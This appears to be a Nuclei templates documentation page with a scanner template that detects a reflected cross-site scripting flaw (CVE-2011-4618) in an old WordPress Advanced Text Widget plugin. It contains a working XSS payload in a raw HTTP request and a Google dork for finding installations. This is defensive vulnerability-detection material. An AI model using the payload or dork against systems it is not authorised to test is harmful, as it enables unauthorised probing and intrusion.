Skip to content
Nuclei Templates

Advanced Text Widget < 2.0.2 - Cross-Site Scripting

ID: CVE-2011-4618

Severity: medium

Author: daffainfo

Tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme

Description

Section titled “Description”

A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2011-4618


info:
  name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
  impact: |
    Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4618
    - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities
    - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/
    - http://www.openwall.com/lists/oss-security/2011/12/19/6
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-4618
    cwe-id: CWE-79
    epss-score: 0.01913
    epss-percentile: 0.88293
    cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: simplerealtytheme
    product: advanced_text_widget_plugin
    google-query: inurl:"/wp-content/plugins/advanced-text-widget"
  tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme


http:
  - raw:
      - |
        GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "</script><script>alert(document.domain)</script>")'
          - 'contains(body_1, "Advanced Text Widget")'
        condition: and
# digest: 490a004630440220491841e64f0fab7743a73000cacfe1af3898760fe8a21ced532cbefe72eee36b02205aa967dd54d99496d6d6017d9e4fbb25c215f41dbc58ffde0d31048df0220061:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2011/CVE-2011-4618.yaml"

View on Github